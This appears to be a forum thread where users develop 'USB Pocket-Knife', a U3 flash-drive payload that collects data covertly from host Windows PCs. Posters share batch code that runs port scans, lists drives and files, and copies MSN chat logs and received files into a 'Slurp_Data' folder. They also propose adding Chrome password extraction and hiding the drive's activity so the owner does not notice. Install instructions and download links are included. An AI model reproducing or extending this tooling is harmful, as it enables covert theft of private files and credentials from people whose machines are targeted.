USB Pocket-Knife Development

Leapo

Added a block down near the end:

IF NOT EXIST %config%\Port_Scan.cfg GOTO SkipPortScan
    ECHO ----------------------------------------------------------------------------------------------------------------------------- >> %log% 2>&1
    ECHO +----------------------------------+ >> %log% 2>&1
    ECHO + [Port Scan] + >> %log% 2>&1
        .\portqry -local -v -v >> %log% 2>&1
:SkipPortScan

IF NOT EXIST %config%\Slurp1.cfg GOTO SkipSlurp1a
	ECHO ----------------------------------------------------------------------------------------------------------------------------- >> %log% 2>&1
	ECHO + [File Type Associations] + >> %log% 2>&1
		assoc >> %log% 2>&1

ECHO + [Driver Info] + >> %log% 2>&1
		driverquery >> %log% 2>&1

ECHO + [C:\ Tree Listing] + >> %log% 2>&1
		tree /F /A C:\ >> %log% 2>&1

:SkipSlurp1a

ECHO. >> %log% 2>&1
ECHO Leapos Payload [Time Finished: %date% %time%] >> %log% 2>&1

I have it key off of Slurp1. (it seems to be that kinda data) I'm thinking of having the tree stored in the slurp folder as a separate file so it doesn't make the log file huge. I'll think on that one.

Still haven't tried the installers. Everything else looks good at the moment.

Going to try and figure out an easy way to ignore the USB card adapter drives. Then try the installers.

• Replies 818
  • Created
  • Last Reply

Top Posters In This Topic

Top Posters In This Topic

Posted Images

Scratch all that....

Made the start of Slurp1 look like:

IF NOT EXIST %config%\Slurp1.cfg GOTO SkipSlurp1
mkdir %logdir%\Slurp_Data\
    tree /F /A C:\ > %logdir%\Slurp_Data\tree.log 2>&1
    assoc > %logdir%\Slurp_Data\assoc.log 2>&1
    driverquery > %logdir%\Slurp_Data\driver.log 2>&1
:: MSN Received Files and chatlogs
mkdir %logdir%\Slurp_Data\MSN\
    fc.exe "%USERPROFILE%\My Documents\My Received Files\*" "%logdir%\Slurp_Data\MSN\*" /i /o

That worked just fine, and kept the main log file looking a lot nicer.

And my idea on getting around the adapter drives failed abysmally. So Leapo, I hope your idea pans out :)

Just tested the payload on windows xp sp2 and it works great! I ran all the payloads except the slurp option that slurps the documents, but otherwise, there was no error. Now, I'm going to try this on my other win xp tmr and on my windows 2000 tmr. Will post results after again

ehm, heres a tool which finds google chrome passes

http://www.nirsoft.net/utils/chromepass.html

its not command line based im pretty sure, so maybe someone here with some techie savvy skills can reverse engineer it? i'd love to, cant find the time mates.

also, i suggest leaving an Empty U3 in there, so when it plugs in, it will look okay, because i always look at my PC load Led, and when its working when im idle, i know something's wrong, i suggest putting the U3 in, could do a little cover up in that matter

Great job to everyone who has worked on this, its made me go out and buy a 4gig cruzer.

Would somebody please write a small tutorial or something to explain how you install it on the actual u3 device?

Im having real trouble here, or just point me in the direction of a guide?

Thanks for any help.

leapo, the latest version isn't working at any way, my U3 drive died, non U3 cant find paths from menu, and cant update, cant run it cuz it cant find go.vbs

I ran it with all options enabled except the big slurp and it worked fine. No errors or anything.

Great job to everyone who has worked on this, its made me go out and buy a 4gig cruzer.

Would somebody please write a small tutorial or something to explain how you install it on the actual u3 device?

Im having real trouble here, or just point me in the direction of a guide?

Thanks for any help.

dittto . would i be right in thinking you install the same way as gonZors switchblade im just wondering what i need to do with the 2 folders u3iso source and flash partition ive looked around the wiki but cant find the solution

thanks

It aint rocket science... if you cant figure it out then probably shouldnt be even messing with it...

why bother to post if you not going to help. if it was that easy then why are there instalation tutorials for other projects. i ask because i have tried a few times now and keep getting an error when i plug usb drive in .

(exception prossesing message )

You flash the ISO to the U3 partition of your U3 flash drive using the 'Universal Customizer", then copy everything inside the "Flash partition" folder to the writable section of your U3 flash drive. You can ignore the "U3 ISO Source" folder, it's for people who want to make changes and rebuild the U3 ISO themselves.

Do I need to start including the universal customizer? I figured most people around here already had it and a premade U3 ISO would be enough.

Scratch all that....

Made the start of Slurp1 look like:

IF NOT EXIST %config%\Slurp1.cfg GOTO SkipSlurp1
mkdir %logdir%\Slurp_Data\
    tree /F /A C:\ > %logdir%\Slurp_Data\tree.log 2>&1
    assoc > %logdir%\Slurp_Data\assoc.log 2>&1
    driverquery > %logdir%\Slurp_Data\driver.log 2>&1
:: MSN Received Files and chatlogs
mkdir %logdir%\Slurp_Data\MSN\
    fc.exe "%USERPROFILE%\My Documents\My Received Files\*" "%logdir%\Slurp_Data\MSN\*" /i /o

That worked just fine, and kept the main log file looking a lot nicer.

And my idea on getting around the adapter drives failed abysmally. So Leapo, I hope your idea pans out :)

I'll add that into start.bat and create a menu option for it in menu.bat

I'm going to give Moonlit's method a spin for drive detection.

serial.bat:

@ECHO OFF
FOR /F "tokens=*" %%S IN ('VOL %1:') DO SET Serial=%%S
SET ESerialF=%Serial:~24,4%
SET ESerialS=%Serial:~29,4%
SET FSerial=%ESerialF%%ESerialS%
IF %FSerial%==00000000 SET FlashDrv=%1

How to use it:

@ECHO OFF
SETLOCAL EnableDelayedExpansion
FOR %%i IN ( B C D E F G H I J K L M N O P Q R S T U V W X Y Z ) DO (
        CALL serial.bat %%i
    SET CRV=!FlashDrv!
    )
ECHO %CRV%

REM =Insert the rest of your code here.=

ENDLOCAL

What does it do?

serial.bat calls VOL and parses out the serial number and compares it with the serial number you provide (replace 00000000 with the serial number of your drive in serial.bat). The code used to call serial.bat then places the drive letter of the drive with that serial number in %CRV% for you to use as a variable.

That all works great, but I've got to make it silent and i've got to figure out an easy way for the user to get their drive's serial number in there.

ehm, heres a tool which finds google chrome passes

http://www.nirsoft.net/utils/chromepass.html

its not command line based im pretty sure, so maybe someone here with some techie savvy skills can reverse engineer it? i'd love to, cant find the time mates.

also, i suggest leaving an Empty U3 in there, so when it plugs in, it will look okay, because i always look at my PC load Led, and when its working when im idle, i know something's wrong, i suggest putting the U3 in, could do a little cover up in that matter

Way ahead of you there, and yes, it does support running from the command line ;)

You flash the ISO to the U3 partition of your U3 flash drive using the 'Universal Customizer", then copy everything inside the "Flash partition" folder to the writable section of your U3 flash drive. You can ignore the "U3 ISO Source" folder, it's for people who want to make changes and rebuild the U3 ISO themselves.

Do I need to start including the universal customizer? I figured most people around here already had it and a premade U3 ISO would be enough.

i dont know what im doing wrong leapo but this is what im doing

i put the u3iso into the bin folder of universal convertor then flash the drive ,

i then put the contents of flash partition folder in the root of my u3 drive .

when i reinsert the u3 drive i get a windows popup saying (windows- no disk)

please advise than you

i dont know what im doing wrong leapo but this is what im doing

i put the u3iso into the bin folder of universal convertor then flash the drive ,

i then put the contents of flash partition folder in the root of my u3 drive .

when i reinsert the u3 drive i get a windows popup saying (windows- no disk)

please advise than you

c.f. post 324 above.

This is a known problem that exists if you have a USB card adapter. (one of those things that let you plug CF cards and SD cards and Smart Cards into your PC via a USB port)

I have one on my home pc. Removing it makes the problem go away.

I also have one built into my laptop at work... Can't remove that one.

The problem stems from the drive detection portion of the payload. Leapo's previous post explains how he's trying to get around that.

For the time being, just hit "Cancel" when that error pops up. (you may have to hit it several times.)

Hey Leapo, I haven't checked, but could the problem also be in the go.vbs file???

backtrack is great for many things getting website passwords hacking bluetooth hacking wireless and many otheres but if you just after simple things that the switchblades do then your better of with a switchblade,

backtrack is linux and if you dont know linux then its quite hard and takes somw getting used to . i have used it for wirless hacking and works a treat.

the only thing with backtrack is you iethere have to install it onto your system as main operating system or dual boot or use a live cd or usb.

youll get plenty of help here if you like to try it http://forums.remote-exploit.org/

you can run it as a virtual machine too in vmware player too (free)

backtrack is great for many things getting website passwords hacking bluetooth hacking wireless and many otheres but if you just after simple things that the switchblades do then your better of with a switchblade,

backtrack is linux and if you dont know linux then its quite hard and takes somw getting used to . i have used it for wirless hacking and works a treat.

the only thing with backtrack is you iethere have to install it onto your system as main operating system or dual boot or use a live cd or usb.

youll get plenty of help here if you like to try it http://forums.remote-exploit.org/

you can run it as a virtual machine too in vmware player too (free)

dude, anyone on this site knows what backtrack is, and what does that have to do with the subject... nothing

dude, anyone on this site knows what backtrack is, and what does that have to do with the subject... nothing

i was replying to the post by jen . ok i answered a question . i have tried it so i answerd .

if you looking for the pocketknife

it here

http://rapidshare.com/files/149235144/Pock..._v0870.zip.html

http://www.megaupload.com/?d=9GKVIQXK